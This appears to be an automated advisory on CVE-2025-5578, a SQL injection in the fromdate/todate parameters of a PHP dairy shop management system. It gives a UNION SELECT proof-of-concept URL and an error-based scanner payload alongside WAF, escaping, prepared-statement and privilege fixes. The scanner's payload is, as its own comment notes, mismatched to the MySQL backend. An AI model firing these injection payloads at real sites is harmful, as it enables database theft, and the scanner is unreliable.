PHPGurukul Dairy Farm Shop Management System 1.3, SQL Injection, CVE-2025-5578 (Critical)

How the CVE-2025-5578 Works

The vulnerability exists in the `/sales-report-details.php` file of PHPGurukul Dairy Farm Shop Management System 1.3. The application fails to properly sanitize user-supplied input in the `fromdate` and `todate` parameters before using them in SQL queries. This allows attackers to inject malicious SQL commands through crafted HTTP requests. The vulnerability is remotely exploitable without authentication, enabling attackers to manipulate database queries, extract sensitive information, or compromise the entire database server. The SQL injection occurs due to direct concatenation of user input into SQL statements without parameterization or proper escaping.

DailyCVE Form

Platform: PHPGurukul Dairy
Version: 1.3
Vulnerability: SQL Injection
Severity: Critical
Date: 06/04/2025

Prediction: Patch by 08/2025

What Undercode Say:

Exploit PoC

```
http://target.com/sales-report-details.php?fromdate=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- &todate=2025-01-01
```

Protection Code

```php
// $conn is an open mysqli connection.
// Escaping is only effective because both values sit inside single quotes in the query.
$fromdate = mysqli_real_escape_string($conn, $_GET['fromdate']);
$todate = mysqli_real_escape_string($conn, $_GET['todate']);
$query = "SELECT * FROM sales WHERE date BETWEEN '$fromdate' AND '$todate'";
```

WAF Rule

```
SecRule ARGS_GET "@detectSQLi" "id:1005578,phase:2,deny,status:403,msg:'CVE-2025-5578 Exploit Attempt'"
```

Vulnerability Scanner

```python
import requests

def check_vuln(url):
    # Note: CONVERT(int, ...) and the "Conversion failed" message are SQL Server (T-SQL)
    # behaviour. The PHP snippets on this page use mysqli (MySQL), so this error-based
    # check is not expected to match there.
    payload = "1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--"
    r = requests.get(f"{url}/sales-report-details.php?fromdate={payload}&todate=2025-01-01")
    return "Conversion failed" in r.text
```

Database Hardening

```sql
-- Remove the web account's database-wide privileges, then grant read-only access to the one table it needs.
REVOKE ALL PRIVILEGES ON dairyfarm.* FROM 'webuser'@'%';
GRANT SELECT ON dairyfarm.sales TO 'webuser'@'%';
```

Secure Alternative

```php
// Prepared statement: the two dates are bound as data and never concatenated into the SQL text.
$stmt = $conn->prepare("SELECT * FROM sales WHERE date BETWEEN ? AND ?");
$stmt->bind_param("ss", $_GET['fromdate'], $_GET['todate']);
$stmt->execute();
```

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
